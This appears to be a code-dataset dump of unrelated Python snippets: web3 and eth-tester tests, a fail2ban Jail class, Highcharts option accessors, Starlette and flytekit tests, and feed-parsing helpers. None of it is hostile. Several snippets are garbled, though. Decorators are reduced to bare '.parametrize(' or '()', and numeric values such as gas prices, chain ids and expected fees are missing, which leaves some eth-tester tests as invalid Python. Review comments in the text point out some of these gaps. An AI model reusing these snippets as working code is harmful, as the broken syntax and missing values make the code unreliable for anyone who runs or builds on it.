code stringlengths 281 23.7M |
|---|
# NOTE(review): the decorator below was truncated to a bare `.parametrize(...)`
# during extraction (invalid syntax); the `@pytest.mark.` prefix is restored.
@pytest.mark.parametrize('name, type_, value, expected', (('atomic_type', 'address', None, {'expected_exception': ValueError, 'match': 'Missing value for field `atomic_type` of type `address`'}), ('non_int_string', 'uint256', 'i am not an int', {'expected_exception': ValueError, 'match': re.escape("invalid literal for int() with base 10: 'i am not an int'")}), ('non_hex_string', 'uint256', '0xi am not an int', {'expected_exception': ValueError, 'match': re.escape("invalid literal for int() with base 10: '0xi am not an int'")}), ('a_string', 'string', [], {'expected_exception': TypeError, 'match': re.escape("Arguments passed as hexstr or text must be of text type. Instead, value was: '[]'")}), ('missing_inner_array', 'string[][]', ['a', 'b', 'c'], {'expected_exception': ValueError, 'match': re.escape("Invalid value for field `missing_inner_array` of type `string[]`: expected array, got `a` of type `<class 'str'>`")})), ids=['None value for atomic type', 'string value that is not convertible to int for int type', 'string starting with 0x that is not convertible to int for int type', 'empty array value for string type', 'string[] value for string[][] type'])
def test_encode_field_fail(name, type_, value, expected):
    """Each invalid (type, value) pairing must raise the documented error from encode_field."""
    # Minimal type registry; the failing paths never reach `Sample`, but the call is realistic.
    types = {'Sample': [{'name': 'name', 'type': 'string'}]}
    with pytest.raises(**expected):
        encode_field(types, name, type_, value)
class EmptyTransforms(TestCase, Common, Edges):
    """Exercise `nutils.transformseq.EmptyTransforms` through the shared Common/Edges suites."""

    def setUp(self):
        super().setUp()
        # 1D->1D empty transform sequence: nothing is contained, so every probe
        # below must be reported as missing and the reference sequence is empty.
        self.seq = nutils.transformseq.EmptyTransforms(todims=1, fromdims=1)
        self.check = ()
        # NOTE(review): l1/i10/x1/i14/r1 appear to be module-level fixture
        # transforms defined elsewhere in this test module — confirm.
        self.checkmissing = ((l1, i10), (x1, i14), (r1, i10))
        self.checkrefs = References.empty(1)
        self.checktodims = 1
        self.checkfromdims = 1
def extractKashiistoriesBlogspotCom(item):
    """Build a release message for a feed item, or None for previews/no-chapter posts.

    Returns False when no known tag matches.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    # Skip posts that carry neither chapter nor volume info, and preview posts.
    if (not (chp or vol)) or 'preview' in item['title'].lower():
        return None
    tagmap = [
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tagname, name, tl_type in tagmap:
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
def compare_chrom_names(a_regions, b_regions):
    """Return the chromosome-name sets of both region tables.

    Raises ValueError when `a_regions` has chromosomes but shares none with
    `b_regions`, listing up to three example names from each side.
    """
    a_chroms = set(a_regions.chromosome.unique())
    b_chroms = set(b_regions.chromosome.unique())
    if a_chroms and a_chroms.isdisjoint(b_chroms):
        msg = 'Chromosome names do not match between files'
        a_fname = a_regions.meta.get('filename')
        b_fname = b_regions.meta.get('filename')
        if a_fname and b_fname:
            msg += f' {a_fname} and {b_fname}'
        a_names = ', '.join(map(repr, sorted(a_chroms)[:3]))
        b_names = ', '.join(map(repr, sorted(b_chroms)[:3]))
        msg += f': {a_names} vs. {b_names}'
        raise ValueError(msg)
    return (a_chroms, b_chroms)
def test_sensor_task():
    """FileSensor serializes with the expected sensor module/name metadata."""
    sensor = FileSensor(name='test_sensor')
    assert (sensor.task_type == 'sensor')
    settings = SerializationSettings(project='project', domain='domain', version='version', env={'FOO': 'baz'}, image_config=ImageConfig(default_image=default_img, images=[default_img]))
    assert (sensor.get_custom(settings) == {'sensor_module': 'flytekit.sensor.file_sensor', 'sensor_name': 'FileSensor'})
    tmp_file = tempfile.NamedTemporaryFile()
    # NOTE(review): the bare `()` below is almost certainly a decorator (e.g. `@task`)
    # that was stripped during extraction; without it `t1` is a plain function and the
    # `>>` chaining below cannot register a dependency — restore from upstream.
    ()
    def t1():
        print('flyte')
    # NOTE(review): `wf` likewise looks like it lost a `@workflow` decorator — confirm.
    def wf():
        (sensor(tmp_file.name) >> t1())
    if (__name__ == '__main__'):
        wf()
def test_windows_10_64bit_system_details(pml_reader_windows10_64bit):
system_details = pml_reader_windows10_64bit.system_details()
assert (system_details['Computer Name'] == 'DESKTOP-6PCIALL')
assert (system_details['Operating System'] == 'Windows 10 (build 16299.2)')
assert (system_details['System Root'] == 'C:\\Windows')
assert (system_details['Logical Processors'] == 2)
assert (system_details['Memory (RAM)'] == '1.99 GB')
assert (system_details['System Type'] == '64-bit') |
class AutoDecoder(AutoModel[DecoderModule[(TransformerConfig, KeyValueCache)]]):
    """Factory that instantiates a concrete decoder module from a model repository."""

    _base_cls = DecoderModule
    _registry = registry.decoders

    # NOTE(review): the `cls` first parameter shows this was a classmethod;
    # the lost decorator is restored.
    @classmethod
    def from_repo(cls, *, repo: Repository, device: Optional[torch.device]=None, quantization_config: Optional[BitsAndBytesConfig]=None) -> DecoderModule[(TransformerConfig, KeyValueCache)]:
        """Load a decoder from `repo`, optionally placing it on `device` / quantizing it."""
        decoder = cls._instantiate_model(repo, device, quantization_config)
        # Guard against a registry entry that is not actually a decoder module.
        assert isinstance(decoder, DecoderModule)
        return decoder
class OptionPlotoptionsSplineSonificationTracksMappingPlaydelay(Options):
    """Accessors for the spline sonification track `playDelay` mapping options.

    NOTE(review): each getter/setter pair below shared one name, so only the
    setter survived class creation; the lost `@property`/`@<name>.setter`
    decorators are restored here.
    """

    @property
    def mapFunction(self):
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
def get_labeled_model_data_list_list(label_and_layout_line_list_list: Sequence[Sequence[Tuple[(str, LayoutLine)]]], data_generator: ModelDataGenerator) -> Sequence[Sequence[LabeledLayoutModelData]]:
    """Apply `get_labeled_model_data_list` to every inner sequence, preserving order."""
    results = []
    for inner_list in label_and_layout_line_list_list:
        results.append(get_labeled_model_data_list(inner_list, data_generator=data_generator))
    return results
class Jail(object):
    """A Fail2Ban jail: one log filter feeding a ticket queue consumed by actions.

    NOTE(review): the bare getter/setter pairs (``name``, ``database``,
    ``filter``, ``actions``, ``idle``) shadowed each other as plain methods,
    while the class itself reads ``self.name`` / ``self.database`` /
    ``self.filter`` / ``self.actions`` as attributes (e.g. in ``__init__``,
    ``setBanTimeExtra`` and ``restoreCurrentBans``) — the lost ``@property``
    decorators are restored here.
    """

    # Known backends, ordered for the 'auto' fallback scan.
    _BACKENDS = ['pyinotify', 'polling', 'systemd']

    def __init__(self, name, backend='auto', db=None):
        self.__db = db
        # Long names can overflow derived identifiers (e.g. firewall chain names).
        if (len(name) >= 26):
            logSys.warning(('Jail name %r might be too long and some commands might not function correctly. Please shorten' % name))
        self.__name = name
        self.__queue = queue.Queue()
        self.__filter = None
        # Extra ban-time configuration (increment / formula / multipliers / ...).
        self._banExtra = {}
        logSys.info(("Creating new jail '%s'" % self.name))
        if (backend is not None):
            self._setBackend(backend)
        self.backend = backend

    def __repr__(self):
        return ('%s(%r)' % (self.__class__.__name__, self.name))

    def _setBackend(self, backend):
        """Initialize the first working filter backend, starting at `backend`.

        Raises ValueError for an unknown backend name and RuntimeError when no
        backend can be initialized at all.
        """
        (backend, beArgs) = extractOptions(backend)
        backend = backend.lower()
        backends = self._BACKENDS
        if (backend != 'auto'):
            if (not (backend in self._BACKENDS)):
                logSys.error(("Unknown backend %s. Must be among %s or 'auto'" % (backend, backends)))
                raise ValueError(("Unknown backend %s. Must be among %s or 'auto'" % (backend, backends)))
            # Start the scan at the requested backend; later entries are fallbacks.
            backends = backends[backends.index(backend):]
        for b in backends:
            initmethod = getattr(self, ('_init%s' % b.capitalize()))
            try:
                initmethod(**beArgs)
                if ((backend != 'auto') and (b != backend)):
                    logSys.warning(('Could only initiated %r backend whenever %r was requested' % (b, backend)))
                else:
                    logSys.info(('Initiated %r backend' % b))
                self.__actions = Actions(self)
                return
            except ImportError as e:
                # A missing optional dependency is only an error when the
                # backend was explicitly requested (not under 'auto').
                logSys.log((logging.DEBUG if (backend == 'auto') else logging.ERROR), ('Backend %r failed to initialize due to %s' % (b, e)))
        logSys.error(('Failed to initialize any backend for Jail %r' % self.name))
        raise RuntimeError(('Failed to initialize any backend for Jail %r' % self.name))

    def _initPolling(self, **kwargs):
        from .filterpoll import FilterPoll
        logSys.info(("Jail '%s' uses poller %r" % (self.name, kwargs)))
        self.__filter = FilterPoll(self, **kwargs)

    def _initPyinotify(self, **kwargs):
        from .filterpyinotify import FilterPyinotify
        logSys.info(("Jail '%s' uses pyinotify %r" % (self.name, kwargs)))
        self.__filter = FilterPyinotify(self, **kwargs)

    def _initSystemd(self, **kwargs):
        from .filtersystemd import FilterSystemd
        logSys.info(("Jail '%s' uses systemd %r" % (self.name, kwargs)))
        self.__filter = FilterSystemd(self, **kwargs)

    @property
    def name(self):
        """Jail name (read-only)."""
        return self.__name

    @property
    def database(self):
        """Persistence database, or None when not configured."""
        return self.__db

    @database.setter
    def database(self, value):
        self.__db = value

    @property
    def filter(self):
        """The filter instance created by the selected backend."""
        return self.__filter

    @property
    def actions(self):
        """The actions object bound to this jail."""
        return self.__actions

    @property
    def idle(self):
        """True when either the filter or the actions are idle."""
        return (self.filter.idle or self.actions.idle)

    @idle.setter
    def idle(self, value):
        self.filter.idle = value
        self.actions.idle = value

    def status(self, flavor='basic'):
        """Return [(section, status), ...] pairs for the filter and the actions."""
        return [('Filter', self.filter.status(flavor=flavor)), ('Actions', self.actions.status(flavor=flavor))]

    def hasFailTickets(self):
        """Return True when failure tickets are waiting in the queue."""
        return (not self.__queue.empty())

    def putFailTicket(self, ticket):
        """Enqueue a failure ticket for processing by the actions."""
        self.__queue.put(ticket)

    def getFailTicket(self):
        """Dequeue the next failure ticket, or False when the queue is empty."""
        try:
            ticket = self.__queue.get(False)
            return ticket
        except queue.Empty:
            return False

    def setBanTimeExtra(self, opt, value):
        """Set one banTime.* option and rebuild the ban-time evaluation formula."""
        be = self._banExtra
        if (value == ''):
            value = None
        if (value is not None):
            be[opt] = value
        elif (opt in be):
            del be[opt]
        logSys.info('Set banTime.%s = %s', opt, value)
        if (opt == 'increment'):
            be[opt] = _as_bool(value)
            if (be.get(opt) and (self.database is None)):
                logSys.warning('ban time increment is not available as long jail database is not set')
        if (opt in ['maxtime', 'rndtime']):
            if (not (value is None)):
                be[opt] = MyTime.str2seconds(value)
        # Rebuild the cached evformula whenever an input option changes
        # (or when no formula has been built yet).
        if ((opt in ['formula', 'factor', 'maxtime', 'rndtime', 'multipliers']) or (be.get('evformula', None) is None)):
            if (opt == 'multipliers'):
                be['evmultipliers'] = [int(i) for i in (value.split(' ') if ((value is not None) and (value != '')) else [])]
            multipliers = be.get('evmultipliers', [])
            # NOTE(review): eval/compile of operator-supplied config — trusted input only.
            banFactor = eval(be.get('factor', '1'))
            if len(multipliers):
                # Table-driven growth: the last multiplier is reused beyond the table.
                evformula = (lambda ban, banFactor=banFactor: ((ban.Time * banFactor) * multipliers[(ban.Count if (ban.Count < len(multipliers)) else (- 1))]))
            else:
                # Default exponential growth, capped at 2**20.
                formula = be.get('formula', 'ban.Time * (1<<(ban.Count if ban.Count<20 else 20)) * banFactor')
                formula = compile(formula, '~inline-conf-expr~', 'eval')
                evformula = (lambda ban, banFactor=banFactor, formula=formula: max(ban.Time, eval(formula)))
            if (not (be.get('maxtime', None) is None)):
                maxtime = be['maxtime']
                evformula = (lambda ban, evformula=evformula: min(evformula(ban), maxtime))
            # Random jitter to avoid predictable unban times.
            if (not (be.get('rndtime', None) is None)):
                rndtime = be['rndtime']
                evformula = (lambda ban, evformula=evformula: (evformula(ban) + (random.random() * rndtime)))
            be['evformula'] = evformula

    def getBanTimeExtra(self, opt=None):
        """Return one banTime.* option (or the whole dict when `opt` is None)."""
        if (opt is not None):
            return self._banExtra.get(opt, None)
        return self._banExtra

    def getMaxBanTime(self):
        """Maximal ban time: configured cap when incrementing, else the action default."""
        return (self._banExtra.get('maxtime', (- 1)) if self._banExtra.get('increment') else self.actions.getBanTime())

    def restoreCurrentBans(self, correctBanTime=True):
        """Re-queue still-valid bans from the database after a restart."""
        try:
            if (self.database is not None):
                if self._banExtra.get('increment'):
                    forbantime = None
                    if correctBanTime:
                        correctBanTime = self.getMaxBanTime()
                else:
                    forbantime = self.actions.getBanTime()
                for ticket in self.database.getCurrentBans(jail=self, forbantime=forbantime, correctBanTime=correctBanTime, maxmatches=self.filter.failManager.maxMatches):
                    try:
                        # Don't restore bans for addresses that are now ignored.
                        if self.filter._inIgnoreIPList(ticket.getID(), ticket):
                            continue
                        ticket.restored = True
                        # Shrink the remaining ban time by the elapsed downtime;
                        # -1 means a permanent ban and is never adjusted.
                        btm = ticket.getBanTime(forbantime)
                        diftm = (MyTime.time() - ticket.getTime())
                        if ((btm != (- 1)) and (diftm > 0)):
                            btm -= diftm
                        if ((btm != (- 1)) and (btm <= 0)):
                            continue
                        self.putFailTicket(ticket)
                    except Exception as e:
                        logSys.error('Restore ticket failed: %s', e, exc_info=(logSys.getEffectiveLevel() <= logging.DEBUG))
        except Exception as e:
            logSys.error('Restore bans failed: %s', e, exc_info=(logSys.getEffectiveLevel() <= logging.DEBUG))

    def start(self):
        """Start filter and actions threads, then restore persisted bans."""
        logSys.debug('Starting jail %r', self.name)
        self.filter.start()
        self.actions.start()
        self.restoreCurrentBans()
        logSys.info('Jail %r started', self.name)

    def stop(self, stop=True, join=True):
        """Stop and/or join the filter and actions threads."""
        if stop:
            logSys.debug('Stopping jail %r', self.name)
        for obj in (self.filter, self.actions):
            try:
                if stop:
                    obj.stop()
                if join:
                    obj.join()
            except Exception as e:
                logSys.error('Stop %r of jail %r failed: %s', obj, self.name, e, exc_info=(logSys.getEffectiveLevel() <= logging.DEBUG))
        if join:
            logSys.info('Jail %r stopped', self.name)

    def isAlive(self):
        """True while either the filter or the actions thread is running."""
        return (self.filter.isAlive() or self.actions.isAlive())
class OptionSeriesPieSonificationTracksMappingLowpassFrequency(Options):
    """Accessors for the pie-series sonification `lowpass.frequency` mapping options.

    NOTE(review): each getter/setter pair below shared one name, so only the
    setter survived class creation; the lost `@property`/`@<name>.setter`
    decorators are restored here.
    """

    @property
    def mapFunction(self):
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
def extractFujotalkWordpressCom(item):
    """Build a release message for a feed item, or None for previews/no-chapter posts.

    Returns False when no known tag matches.
    """
    title = item['title']
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
    if 'preview' in title.lower() or not (chp or vol):
        return None
    for tagname, name, tl_type in (('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')):
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
def test_lifespan_sync(test_client_factory):
    """Deprecated on_startup/on_shutdown hooks still fire at the right lifecycle points."""
    events = {'startup': False, 'shutdown': False}

    def hello_world(request):
        return PlainTextResponse('hello, world')

    def run_startup():
        events['startup'] = True

    def run_shutdown():
        events['shutdown'] = True

    # Constructing the router with the legacy hooks must emit a deprecation warning.
    with pytest.deprecated_call(match='The on_startup and on_shutdown parameters are deprecated'):
        app = Router(on_startup=[run_startup], on_shutdown=[run_shutdown], routes=[Route('/', hello_world)])
    assert not events['startup']
    assert not events['shutdown']
    with test_client_factory(app) as client:
        assert events['startup']
        assert not events['shutdown']
        client.get('/')
    assert events['startup']
    assert events['shutdown']
def test_correct_response(client, monkeypatch, elasticsearch_transaction_index, awards_and_transactions):
    """The spending-by-CFDA endpoint returns the expected aggregated payload."""
    setup_elasticsearch_test(monkeypatch, elasticsearch_transaction_index)
    request_body = json.dumps({'filters': {'time_period': [{'start_date': '2018-10-01', 'end_date': '2020-09-30'}]}})
    response = client.post('/api/v2/search/spending_by_category/cfda', content_type='application/json', data=request_body)
    assert response.status_code == status.HTTP_200_OK, 'Failed to return 200 Response'
    expected_response = {'category': 'cfda', 'limit': 10, 'page_metadata': {'page': 1, 'next': None, 'previous': None, 'hasNext': False, 'hasPrevious': False}, 'results': [{'amount': 550.0, 'code': '20.200', 'id': 200, 'name': 'CFDA 2'}, {'amount': 5.0, 'code': '10.100', 'id': 100, 'name': 'CFDA 1'}], 'messages': [get_time_period_message()]}
    assert response.json() == expected_response
class ModelInformer(BaseAction):
    """Action that writes a model's information JSON and registers it with the service file."""

    def __init__(self, model_id, config_json):
        BaseAction.__init__(self, model_id=model_id, config_json=config_json, credentials_json=None)
        self.information_file = os.path.join(self._dest_dir, self.model_id, INFORMATION_FILE)

    def _write_information_json(self):
        # Serialize the model-information payload to the destination file.
        payload = Information(model_id=self.model_id, config_json=self.config_json).get()
        with open(self.information_file, 'w') as handle:
            json.dump(payload, handle, indent=4)

    def _add_info_api(self):
        # Register the information file with the bundled service definition.
        bundle_path = os.path.join(self._get_bundle_location(self.model_id), self.model_id)
        service_file = ServiceFile(path=bundle_path)
        service_file.add_info_api(information_file=self.information_file)

    def inform(self):
        """Write the information file, then expose it through the info API."""
        self._write_information_json()
        self._add_info_api()
class BaseTestBackendDirect():
def _send_and_check_transaction(self, eth_tester, test_transaction, _from):
transaction = assoc(test_transaction, 'from', _from)
txn_hash = eth_tester.send_transaction(transaction)
txn = eth_tester.get_transaction_by_hash(txn_hash)
self._check_transactions(transaction, txn)
def _check_transactions(sent_transaction, actual_transaction):
assert is_same_address(actual_transaction['from'], sent_transaction['from'])
if (('to' not in sent_transaction) or (sent_transaction['to'] == '')):
assert (actual_transaction['to'] == '')
else:
assert is_same_address(actual_transaction['to'], sent_transaction['to'])
assert (actual_transaction['gas'] == sent_transaction['gas'])
assert (actual_transaction['value'] == sent_transaction['value'])
if (sent_transaction.get('gas_price') is not None):
assert (actual_transaction['gas_price'] == sent_transaction['gas_price'])
else:
assert (actual_transaction['max_fee_per_gas'] == sent_transaction['max_fee_per_gas'])
assert (actual_transaction['max_priority_fee_per_gas'] == sent_transaction['max_priority_fee_per_gas'])
    # Subclasses for backends without EVM execution override this to False.
    supports_evm_execution = True
    def skip_if_no_evm_execution(self):
        """Skip the current test when the backend cannot execute EVM code."""
        if (not self.supports_evm_execution):
            pytest.skip('EVM Execution is not supported.')
def test_get_accounts(self, eth_tester):
accounts = eth_tester.get_accounts()
assert accounts
assert all((is_address(account) for account in accounts))
    def test_add_account_no_password(self, eth_tester):
        """An account added from a raw key without a password can send immediately."""
        account = eth_tester.add_account(PK_A)
        assert is_address(account)
        assert any((is_same_address(account, value) for value in eth_tester.get_accounts()))
        # Fund the new account so it can pay gas for the follow-up transaction.
        eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': account, 'value': (1 * denoms.ether), 'gas': 21000, 'gas_price': NON_DEFAULT_GAS_PRICE})
        self._send_and_check_transaction(eth_tester, SIMPLE_TRANSACTION, account)
    def test_add_account_with_password(self, eth_tester):
        """A password-protected account only sends while unlocked."""
        account = eth_tester.add_account(PK_A, 'test-password')
        assert is_address(account)
        assert any((is_same_address(account, value) for value in eth_tester.get_accounts()))
        # Fund the new account so it can pay gas for the follow-up transactions.
        eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': account, 'value': (1 * denoms.ether), 'gas': 21000, 'gas_price': NON_DEFAULT_GAS_PRICE})
        # Locked by default: sending must fail.
        with pytest.raises(AccountLocked):
            self._send_and_check_transaction(eth_tester, SIMPLE_TRANSACTION, account)
        eth_tester.unlock_account(account, 'test-password')
        self._send_and_check_transaction(eth_tester, SIMPLE_TRANSACTION, account)
        # Re-locking restores the failure.
        eth_tester.lock_account(account)
        with pytest.raises(AccountLocked):
            self._send_and_check_transaction(eth_tester, SIMPLE_TRANSACTION, account)
def test_get_balance_of_listed_accounts(self, eth_tester):
for account in eth_tester.get_accounts():
balance = eth_tester.get_balance(account)
assert is_integer(balance)
assert (balance >= UINT256_MIN)
assert (balance <= UINT256_MAX)
    def test_get_code_account_with_code(self, eth_tester):
        """A deployed contract address reports its runtime bytecode."""
        self.skip_if_no_evm_execution()
        emitter_address = _deploy_emitter(eth_tester)
        code = eth_tester.get_code(emitter_address)
        # NOTE(review): expected runtime bytecode of the emitter fixture —
        # confirm this constant against the upstream test suite.
        assert (code == '0xe060020abb563dc0cf0256eb41d8b146101ca5780639caa6fde17bfa9575b005bffa95e6e2a182411e7a6f9ed114a85c3761d87f9b8f453d842c71235aa64fff99ff0104600fffaba15b50565ba577f1e86022f78f8d04f8e3dfd13a2bdb280403e6632877c0dbee5e4eeb259908a5cabacff039d147f23fe975a4254bdf6b1502b8c79132ae1833986b7ccef2638e73fdf991a15bbdfdf0cb1dea99afceb3ea698d62e705b736f1345a7eee9eb07e63d1f8f556c1bca15bbaf4a25b279c7c585f25eda9788ac9420ebadae78ca6b206a0e6ab488fd81fa15bbf56d2ef3c5228bf5de325a4672ab50e033749a601e4f4a5e1dce905da15b5050565bff532fd6ea96cfb78bb46e09279a26828b8b493de1a2b8b1ee1face527978a15af0104600fffaa150565bdabb600bdfa30ece802b64cd2b7e57dabf4010aabf5df26d1556977affb07b98a77ad955ba36101c3565bff057bc32826fbe161da1c110afcdcae7c109a8b69149f727fc37a603c60ef94caabdab600adff16c999b533366ca5138d78e85dacd05749f098d6c225d4cd42ee6ecaba57807ff70fe689e290d8ce2b2a388ac28db36fbb0e16a6d89c6804c461f65a1b40bba26102a5565bda16102a556')
def test_get_code_account_without_code(self, eth_tester):
code = eth_tester.get_code(BURN_ADDRESS)
assert (code == '0x')
def test_get_nonce(self, eth_tester):
for account in eth_tester.get_accounts():
nonce = eth_tester.get_nonce(account)
assert is_integer(nonce)
assert (nonce >= UINT256_MIN)
assert (nonce <= UINT256_MAX)
    # NOTE(review): this decorator was corrupted during extraction — the
    # `@pytest.mark.` prefix is missing AND the expected base-fee values inside
    # `[, , ]` were stripped, so this line is not valid Python; both must be
    # restored from upstream history before the test can run.
    .parametrize('block_count,newest_block,reward_percentiles,expected', [[3, 'latest', [], {'base_fee_per_gas': [, , ], 'gas_used_ratio': [0.0, 0.0, 0.0], 'reward': []}], [1, 'safe', [], {'base_fee_per_gas': [], 'gas_used_ratio': [0.0], 'reward': []}], [1, 'finalized', [], {'base_fee_per_gas': [], 'gas_used_ratio': [0.0], 'reward': []}], [1, 'earliest', [], {'base_fee_per_gas': [], 'gas_used_ratio': [], 'reward': []}], [1, 'pending', [], {'base_fee_per_gas': [], 'gas_used_ratio': [0.0], 'reward': []}]])
    def test_get_fee_history(self, eth_tester, block_count, newest_block, reward_percentiles, expected):
        """eth_feeHistory returns per-block base fees, gas-used ratios and rewards."""
        self.skip_if_no_evm_execution()
        eth_tester.mine_blocks(10)
        fee_history = eth_tester.get_fee_history(block_count, newest_block, reward_percentiles)
        assert (fee_history['oldest_block'] == 1)
        assert (fee_history['base_fee_per_gas'] == expected['base_fee_per_gas'])
        assert (fee_history['gas_used_ratio'] == expected['gas_used_ratio'])
        assert (fee_history['reward'] == expected['reward'])
.parametrize('block_count,newest_block,reward_percentiles,error,message', [[1, None, None, BlockNotFound, 'No block found for block number: None'], [0, None, None, ValidationError, 'block_count must be between 1 and 1024']])
def test_get_fee_history_fails(self, eth_tester, block_count, newest_block, reward_percentiles, error, message):
self.skip_if_no_evm_execution()
eth_tester.mine_blocks(10)
with pytest.raises(error, match=message):
eth_tester.get_fee_history(block_count, newest_block, reward_percentiles)
def test_mine_block_single(self, eth_tester):
eth_tester.mine_blocks()
before_block_number = eth_tester.get_block_by_number('latest')['number']
eth_tester.mine_blocks()
after_block_number = eth_tester.get_block_by_number('latest')['number']
assert is_integer(before_block_number)
assert is_integer(after_block_number)
assert (before_block_number == (after_block_number - 1))
def test_mine_multiple_blocks(self, eth_tester):
eth_tester.mine_blocks()
before_block_number = eth_tester.get_block_by_number('latest')['number']
eth_tester.mine_blocks(10)
after_block_number = eth_tester.get_block_by_number('latest')['number']
assert is_integer(before_block_number)
assert is_integer(after_block_number)
assert (before_block_number == (after_block_number - 10))
def test_gas_limit_constant(self, eth_tester):
eth_tester.mine_blocks()
before_gas_limit = eth_tester.get_block_by_number('latest')['gas_limit']
eth_tester.mine_blocks()
after_gas_limit = eth_tester.get_block_by_number('latest')['gas_limit']
assert (before_gas_limit == after_gas_limit)
.parametrize('is_pending', [True, False])
def test_send_raw_transaction_valid_raw_transaction(self, eth_tester, is_pending):
raw_privkey = (b'\x11' * 32)
test_key = keys.PrivateKey(raw_privkey)
eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': test_key.public_key.to_checksum_address(), 'gas': 21000, 'value': (1 * denoms.ether)})
transaction_hex = '0xfb9acae7e376e7c213b7e7e7e46cc70a5dd086daff2aba0b101c1f9dc0c588c0194a1093f06e6b30d1fd16d31014ef5851311b7bfbf419ea01cfa8757b7863a630ef7491c62b03d9cd9dff395f61b5df500cc665f0fa5b027'
if is_pending:
eth_tester.disable_auto_mine_transactions()
transaction_hash = eth_tester.send_raw_transaction(transaction_hex)
if is_pending:
with pytest.raises(TransactionNotFound):
eth_tester.get_transaction_receipt(transaction_hash)
eth_tester.enable_auto_mine_transactions()
receipt = eth_tester.get_transaction_receipt(transaction_hash)
assert (receipt['transaction_hash'] == transaction_hash)
def test_send_raw_transaction_invalid_rlp_transaction(self, eth_tester):
self.skip_if_no_evm_execution()
invalid_transaction_hex = '0x1234'
import eth
with pytest.raises(eth.exceptions.UnrecognizedTransactionType):
eth_tester.send_raw_transaction(invalid_transaction_hex)
def test_send_raw_transaction_invalid_raw_transaction(self, eth_tester):
self.skip_if_no_evm_execution()
invalid_transaction_hex = '0xffff'
with pytest.raises(rlp.exceptions.DecodingError):
eth_tester.send_raw_transaction(invalid_transaction_hex)
.parametrize('test_transaction', (SIMPLE_TRANSACTION, TRANSACTION_WTH_NONCE, CONTRACT_TRANSACTION_EMPTY_TO, CONTRACT_TRANSACTION_MISSING_TO), ids=['Simple transaction', 'Transaction with nonce', 'Create Contract - empty to', 'Create Contract - missing to'])
def test_send_transaction(self, eth_tester, test_transaction):
accounts = eth_tester.get_accounts()
assert accounts, 'No accounts available for transaction sending'
self._send_and_check_transaction(eth_tester, test_transaction, accounts[0])
    def test_send_transaction_raises_with_legacy_and_dynamic_fee_fields(self, eth_tester):
        """Mixing legacy `gas_price` with dynamic-fee fields must be rejected."""
        accounts = eth_tester.get_accounts()
        assert accounts, 'No accounts available for transaction sending'
        # NOTE(review): the fee values after `gas_price`, `max_fee_per_gas` and
        # `max_priority_fee_per_gas` were stripped during extraction (`: ,`);
        # this line is not valid Python until they are restored from upstream.
        test_transaction = {'to': accounts[0], 'from': accounts[0], 'value': 1, 'gas': 21000, 'gas_price': , 'max_fee_per_gas': , 'max_priority_fee_per_gas': }
        with pytest.raises(ValidationError, match='legacy and dynamic fee transaction values'):
            self._send_and_check_transaction(eth_tester, test_transaction, accounts[0])
    def test_send_transaction_no_gas_price_or_dynamic_fees(self, eth_tester):
        """Omitting all fee fields defaults the transaction to dynamic-fee (type 0x2)."""
        accounts = eth_tester.get_accounts()
        assert accounts, 'No accounts available for transaction sending'
        test_transaction = dissoc(SIMPLE_TRANSACTION, 'gas_price')
        test_transaction = assoc(test_transaction, 'from', accounts[0])
        txn_hash = eth_tester.send_transaction(test_transaction)
        sent_transaction = eth_tester.get_transaction_by_hash(txn_hash)
        assert (sent_transaction.get('type') == '0x2')
        # NOTE(review): the expected fee values were stripped during extraction
        # (`== )`); these assertions are not valid Python until they are
        # restored from upstream.
        assert (sent_transaction.get('max_fee_per_gas') == )
        assert (sent_transaction.get('max_priority_fee_per_gas') == )
        assert (sent_transaction.get('access_list') == ())
        assert (sent_transaction.get('gas_price') == )
    def test_send_access_list_transaction(self, eth_tester):
        """Access-list (type 0x1) transactions round-trip with and without entries."""
        accounts = eth_tester.get_accounts()
        assert accounts, 'No accounts available for transaction sending'
        # NOTE(review): the `chain_id` and `gas_price` values were stripped during
        # extraction (`: ,`); restore them from upstream before running.
        access_list_transaction = {'chain_id': , 'from': accounts[0], 'to': accounts[0], 'value': 1, 'gas': 40000, 'gas_price': , 'access_list': ()}
        txn_hash = eth_tester.send_transaction(access_list_transaction)
        txn = eth_tester.get_transaction_by_hash(txn_hash)
        assert (txn.get('type') == '0x1')
        assert (txn.get('access_list') == ())
        self._check_transactions(access_list_transaction, txn)
        # Re-send with a populated access list; the backend must echo it non-empty.
        access_list_transaction['access_list'] = ({'address': '0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae', 'storage_keys': ('0x', '0x')}, {'address': '0xbb9bc244d798123fde783fcc1c72d3bb8c189413', 'storage_keys': ()})
        txn_hash = eth_tester.send_transaction(access_list_transaction)
        txn = eth_tester.get_transaction_by_hash(txn_hash)
        assert (txn.get('type') == '0x1')
        assert (txn.get('access_list') != ())
        self._check_transactions(access_list_transaction, txn)
